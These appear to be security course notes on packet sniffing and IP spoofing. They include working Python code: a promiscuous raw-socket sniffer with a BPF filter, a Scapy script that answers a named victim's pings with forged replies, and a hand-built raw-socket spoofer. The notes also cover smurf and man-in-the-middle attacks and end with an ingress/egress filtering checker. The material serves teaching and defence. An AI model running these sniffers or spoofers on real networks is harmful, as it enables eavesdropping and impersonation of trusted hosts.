Sniffing & Spoofing

  • sniffing: attacker eavesdrops on a physical network and captures packets transmitted over it
  • spoofing: attacker sends packets under a false identity (forged header fields, typically the source address)

  • machines connect to a network through Network Interface Cards (NICs)

    • each NIC has a MAC address
    • on a shared medium every NIC hears all frames on the wire (on a switched network the switch only forwards unicast frames to the port that owns the destination MAC, so promiscuous mode alone does not reveal other hosts' traffic)
    • if the destination MAC matches the NIC's own address (or is a broadcast/multicast address), the frame is copied into a kernel buffer; otherwise it is dropped
    • the NIC raises an interrupt and the CPU copies the frame from the buffer into a queue
    • based on the protocol, different callbacks (and eventually applications) process the data in the queue
    • a NIC can be put in promiscuous mode so that it does not drop frames whose destination MAC does not match its own
  • WiFi devices face interference from other nearby devices: access points put WiFi devices on different channels to reduce the effect of interference

    • a WiFi card listens on one channel at a time, so it only sees a subset of the frames in the air and misses anything sent on another channel
    • WiFi cards can be placed in monitor mode to capture all frames on a channel, including those of other networks (but many wireless NICs do not support monitor mode, or the manufacturer's driver disables it)
  • the BSD Packet Filter (BPF) on Unix systems filters out unwanted sniffed packets: usually one is only interested in packets of a specific protocol, host or port

    • a user-space program attaches a filter program to a socket, causing the kernel to drop unwanted packets as early as possible, before they are copied to user space
  • packet sniffer programs capture packets intended for other destination machines that share the network cable

    • very basic implementation flow, using raw sockets:
      1. create a raw socket
      2. choose the protocol (the type of packets to receive, e.g. IP packets, or all)
      3. enable promiscuous mode
      4. wait for packets and decode them
    • real tools: Wireshark
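The BPF point and the raw-socket sniffer flow above, as one added example that is not code from the original notes: a Python AF_PACKET sniffer for Linux that creates the raw socket, selects all EtherTypes, enables promiscuous mode and attaches the classic BPF program for `icmp` (the instruction list `tcpdump -dd icmp` prints) so the kernel discards everything else before it reaches user space. A small user-space interpreter for that program is included so the filter's effect can be checked on constructed frames without root. The interface name `eth0`, the sample MAC and IP addresses, and the value of the SO_ATTACH_FILTER constant (26 on Linux; Python's socket module does not export it) are assumptions.

```python
#!/usr/bin/env python3
"""Raw-socket sniffer with a classic BPF filter (added example, Linux only).

BPF_ICMP is the program `tcpdump -dd icmp` prints.  run_filter() evaluates it
in user space so its effect can be checked on constructed frames without root;
attach_and_sniff() hands the same program to the kernel via SO_ATTACH_FILTER
on a promiscuous AF_PACKET socket, i.e. the "raw socket + promiscuous mode +
filter + wait" flow from the notes.
"""
import ctypes
import socket
import struct
import sys

# classic BPF instructions as (code, jt, jf, k); jump offsets are relative
# to the instruction after the jump
BPF_ICMP = [
    (0x28, 0, 0, 0x0000000c),  # ldh [12]             ; load EtherType
    (0x15, 0, 3, 0x00000800),  # jeq #0x800 jt 2 jf 5 ; IPv4?
    (0x30, 0, 0, 0x00000017),  # ldb [23]             ; load IP protocol field
    (0x15, 0, 1, 0x00000001),  # jeq #1 jt 4 jf 5     ; ICMP?
    (0x06, 0, 0, 0x00040000),  # ret #262144          ; accept, up to snaplen bytes
    (0x06, 0, 0, 0x00000000),  # ret #0               ; drop
]
SO_ATTACH_FILTER = 26   # assumed: value from Linux <asm/socket.h>, not in the socket module
ETH_P_ALL = 0x0003      # receive every EtherType


def run_filter(prog, frame):
    """Interpret the BPF subset used above; returns bytes to keep (0 = drop)."""
    acc, pc = 0, 0
    while pc < len(prog):
        code, jt, jf, k = prog[pc]
        if code == 0x28:                          # ldh: 16-bit big-endian load
            if k + 2 > len(frame):
                return 0                          # out-of-bounds load drops, as in the kernel
            acc = struct.unpack_from("!H", frame, k)[0]
        elif code == 0x30:                        # ldb: byte load
            if k >= len(frame):
                return 0
            acc = frame[k]
        elif code == 0x15:                        # jeq: skip jt or jf instructions
            pc += jt if acc == k else jf
        elif code == 0x06:                        # ret
            return k
        else:
            raise ValueError("unsupported BPF opcode 0x%02x" % code)
        pc += 1
    return 0


def ethernet_frame(proto, payload):
    """Constructed sample input: Ethernet + minimal IPv4 header (no options) around payload."""
    eth = b"\xff" * 6 + bytes.fromhex("001122334455") + struct.pack("!H", 0x0800)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                     bytes([10, 0, 2, 69]), bytes([10, 0, 2, 5]))
    return eth + ip + payload


def attach_and_sniff(iface, prog, count=5):
    """Raw socket, all protocols, promiscuous mode, kernel filter, then wait (needs root)."""
    sock = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETH_P_ALL))
    sock.bind((iface, 0))
    # promiscuous mode: struct packet_mreq {ifindex, type, alen, address[8]}
    mreq = struct.pack("IHH8s", socket.if_nametoindex(iface), socket.PACKET_MR_PROMISC, 0, b"\x00" * 8)
    sock.setsockopt(socket.SOL_PACKET, socket.PACKET_ADD_MEMBERSHIP, mreq)
    # attach the filter: struct sock_fprog {len, pointer to sock_filter[]}
    insns = b"".join(struct.pack("HBBI", *i) for i in prog)
    buf = ctypes.create_string_buffer(insns)          # must stay alive until setsockopt returns
    fprog = struct.pack("HL", len(prog), ctypes.addressof(buf))
    sock.setsockopt(socket.SOL_SOCKET, SO_ATTACH_FILTER, fprog)
    # from here on the kernel drops non-ICMP frames before they reach user space
    for _ in range(count):
        frame, _ = sock.recvfrom(65535)
        # offsets assume an IPv4 header without options (14 + 12 / 14 + 16)
        print("%d bytes  src %s  dst %s" % (len(frame), socket.inet_ntoa(frame[26:30]),
                                            socket.inet_ntoa(frame[30:34])))


if __name__ == "__main__":
    attach_and_sniff(sys.argv[1] if len(sys.argv) > 1 else "eth0", BPF_ICMP)
```

Run as root with the interface name as the only argument; `run_filter(BPF_ICMP, ethernet_frame(1, b"\x08\x00" + b"\x00" * 6))` shows without root that the program accepts an ICMP frame while a TCP (protocol 6) or ARP frame is returned as 0, i.e. dropped.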
  • packet spoofing: some critical packet information (typically the source address) is forged

    • tools: Netwox, Scapy (Python)
    • two major parts to implementing a spoofing program:
      1. constructing the packet: fill in the headers and the payload
        • UDP packets carry payload data (a TCP segment such as a SYN can be sent with an empty payload)
        • the UDP checksum does not matter: an all-zero checksum means "no checksum" in IPv4 and the receiving OS accepts the packet anyway; on Linux the kernel fills in the IP header checksum of a raw-socket packet if it is left as 0
      2. sending out the packet: use a raw socket with IP_HDRINCL set so the forged IP header is used as-is (usually requires root)
  • attack combining sniffing and spoofing: capture a packet first, then construct and send a spoofed reply based on its contents (e.g. answer an ICMP echo request on behalf of the pinged host)

Sniff and spoof example with scapy

#!/usr/bin/python3
from scapy.all import *

def spoof_pkt(pkt):
    # only react to ICMP echo requests (type 8)
    if ICMP in pkt and pkt[ICMP].type == 8:
        print("Original Packet.........")
        print("Source IP : ", pkt[IP].src)
        print("Destination IP :", pkt[IP].dst)

        # swap source and destination so the reply appears to come from the pinged host
        ip = IP(src=pkt[IP].dst, dst=pkt[IP].src, ihl=pkt[IP].ihl)
        # an echo reply (type 0) must carry the request's id and seq to be accepted
        icmp = ICMP(type=0, id=pkt[ICMP].id, seq=pkt[ICMP].seq)
        # echo the request's payload too; a request without payload has no Raw layer
        data = pkt[Raw].load if Raw in pkt else b""
        newpkt = ip/icmp/data

        print("Spoofed Packet.........")
        print("Source IP : ", newpkt[IP].src)
        print("Destination IP :", newpkt[IP].dst)

        # scapy fills in lengths and checksums before sending
        send(newpkt, verbose=0)

# sniff ICMP packets from the victim 10.0.2.69 and answer every echo request
pkt = sniff(filter='icmp and src host 10.0.2.69', prn=spoof_pkt)
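The Scapy script above leaves header construction to the library. Here is the same echo-reply forgery done by hand in plain Python, as an added example that is not part of the original notes or the Scapy code: it parses the sniffed request bytes, swaps the addresses, echoes id, seq and payload, computes the ICMP and IPv4 checksums (the "fill in headers and payload" step), and sends the result through a raw socket with IP_HDRINCL (the "send with raw sockets" step). The addresses 10.0.2.69 and 10.0.2.5, the ICMP id 0x1234 and the payload are constructed sample input.

```python
#!/usr/bin/env python3
"""Forge an ICMP echo reply by hand (added example; what the Scapy script hides).

build_echo_reply() takes the raw bytes of a sniffed IPv4/ICMP echo request and
returns a complete IPv4 packet answering it with src/dst swapped.
send_spoofed() pushes such a packet out through a raw socket with IP_HDRINCL.
"""
import socket
import struct


def checksum(data):
    """RFC 1071 one's-complement sum over 16-bit words; 0 when run over a valid header."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo_reply(request, ttl=64):
    """Parse the request, swap addresses, echo id/seq/payload, fill both checksums."""
    (ver_ihl, _tos, _total, _id, _frag, _ttl, proto, _csum,
     src, dst) = struct.unpack("!BBHHHBBH4s4s", request[:20])
    ihl = (ver_ihl & 0x0F) * 4                       # header length honours IP options
    if ver_ihl >> 4 != 4 or proto != 1:
        raise ValueError("not an IPv4/ICMP packet")
    icmp_type, _code, _csum, ident, seq = struct.unpack("!BBHHH", request[ihl:ihl + 8])
    if icmp_type != 8:
        raise ValueError("not an echo request")
    payload = request[ihl + 8:]
    # ICMP header: type 0 (echo reply), code 0, checksum over header + payload
    icmp = struct.pack("!BBHHH", 0, 0, 0, ident, seq) + payload
    icmp = icmp[:2] + struct.pack("!H", checksum(icmp)) + icmp[4:]
    # IPv4 header with src/dst swapped; the header checksum is filled in explicitly
    # (Linux would also do it for a raw socket when the field is left 0)
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0, 0, ttl, 1, 0, dst, src)
    hdr = hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]
    return hdr + icmp


def send_spoofed(packet):
    """Send a packet whose IP header we built ourselves (requires root)."""
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) as s:
        s.setsockopt(socket.IPPROTO_IP, socket.IP_HDRINCL, 1)
        dst = socket.inet_ntoa(packet[16:20])        # destination from our own header
        s.sendto(packet, (dst, 0))


def sample_echo_request():
    """Constructed input: echo request 10.0.2.69 -> 10.0.2.5, as a sniffer would return it."""
    payload = b"abcdefgh"
    icmp = struct.pack("!BBHHH", 8, 0, 0, 0x1234, 1) + payload
    icmp = icmp[:2] + struct.pack("!H", checksum(icmp)) + icmp[4:]
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 7, 0, 64, 1, 0,
                      socket.inet_aton("10.0.2.69"), socket.inet_aton("10.0.2.5"))
    hdr = hdr[:10] + struct.pack("!H", checksum(hdr)) + hdr[12:]
    return hdr + icmp


if __name__ == "__main__":
    reply = build_echo_reply(sample_echo_request())
    print("reply %s -> %s, %d bytes" % (socket.inet_ntoa(reply[12:16]),
                                        socket.inet_ntoa(reply[16:20]), len(reply)))
    send_spoofed(reply)                              # needs root
```

Running `checksum()` over the finished IP header or ICMP message returns 0, which is how a receiver verifies them; that is the check the verifier applies to the forged reply.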
  • IP spoofing: technique used to gain unauthorized access to computers

    • attacker forges messages so they appear to come from a trusted source (can be an internal IP address)
    • attacker may be inside or outside the network
    • usual goals:
      • inject malicious data or commands into an existing stream of data
      • change routing tables to point to the spoofed address, so the attacker receives all packets addressed to it and can reply as the trusted user
    • IP spoofing is easy: routers forward on the destination address only and do not verify the source, and forging packets with raw sockets is easy
  • types of spoofing attacks

    • non-blind spoofing: attacker is on the same subnet as the target and can sniff the sequence and acknowledgement numbers of the connection
    • blind spoofing: takes place from outside the subnet, where sequence and acknowledgement numbers cannot be observed; the attacker sends many packets to sample the target's sequence numbers and predict the next one
    • man-in-the-middle: communication hijacking, intercepting the traffic between two hosts to eliminate or alter the information
    • denial-of-service: consuming bandwidth by flooding the target with (possibly spoofed) packets
    • smurf attack: send an ICMP echo request to the LAN's broadcast address with the source address spoofed to the victim's; every host on the LAN replies to the victim
  • spoofing an IP address can lead to unauthorized (even root) access on remote hosts that trust that address

  • monitoring: look for packets arriving on the external interface whose source address is local (a legitimate packet from outside never carries an internal source)
  • countermeasures: ingress filtering at the border router, dropping inbound packets with an internal source address (and egress filtering in reverse, dropping outbound packets with a non-internal source address, to prevent spoofing originating from one's own site)
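The monitoring rule and the ingress/egress filter above applied to constructed packet records, as an added example that is not part of the original notes: each record names the interface, direction and addresses, and classify() returns whether the border router should pass it or drop it and why. The site prefix 10.0.2.0/24, the interface names eth0 (external) and eth1 (internal), and the `key=value` log format are assumptions.

```python
#!/usr/bin/env python3
"""Border-router anti-spoofing checks over constructed packet records (added example).

classify() applies the two rules from the notes: a packet arriving on the
external interface must not carry an internal source address (ingress rule),
and a packet leaving through the external interface must carry one (egress
rule, which stops spoofing that originates inside the site).
"""
import ipaddress

INTERNAL_NETS = [ipaddress.ip_network("10.0.2.0/24")]   # assumed site prefix
EXTERNAL_IFACE = "eth0"                                 # assumed border interface


def is_internal(addr):
    """True if addr lies in one of the site's own prefixes."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def classify(rec):
    """rec: dict with iface, direction ('in'/'out'), src, dst.  Returns 'allow' or a drop reason."""
    if rec["iface"] != EXTERNAL_IFACE:
        return "allow"                                  # rules only apply at the border
    if rec["direction"] == "in" and is_internal(rec["src"]):
        return "drop: inbound packet claims internal source (ingress filter)"
    if rec["direction"] == "out" and not is_internal(rec["src"]):
        return "drop: outbound packet with non-internal source (egress filter)"
    return "allow"


def parse_log_line(line):
    """Parse 'iface=eth0 dir=in src=... dst=...' records (constructed format)."""
    fields = dict(kv.split("=", 1) for kv in line.split())
    return {"iface": fields["iface"], "direction": fields["dir"],
            "src": fields["src"], "dst": fields["dst"]}


# constructed sample records: normal inbound, spoofed inbound, normal outbound,
# spoofed outbound, and an internal-interface packet the border rules ignore
SAMPLE_LOG = """\
iface=eth0 dir=in src=203.0.113.7 dst=10.0.2.5
iface=eth0 dir=in src=10.0.2.69 dst=10.0.2.5
iface=eth0 dir=out src=10.0.2.5 dst=203.0.113.7
iface=eth0 dir=out src=198.51.100.9 dst=203.0.113.7
iface=eth1 dir=in src=10.0.2.69 dst=10.0.2.5
"""


def audit(log=SAMPLE_LOG):
    """Return (record, verdict) pairs for every line of the log."""
    return [(line, classify(parse_log_line(line))) for line in log.splitlines()]


if __name__ == "__main__":
    for line, verdict in audit():
        print("%-50s %s" % (line, verdict))
```

Only the second and fourth records are dropped: the spoofed inbound packet and the one that would let a host inside the site spoof someone else. The same two rules are what a border router's packet filter should express, with the internal prefix list matching the site's actual addressing.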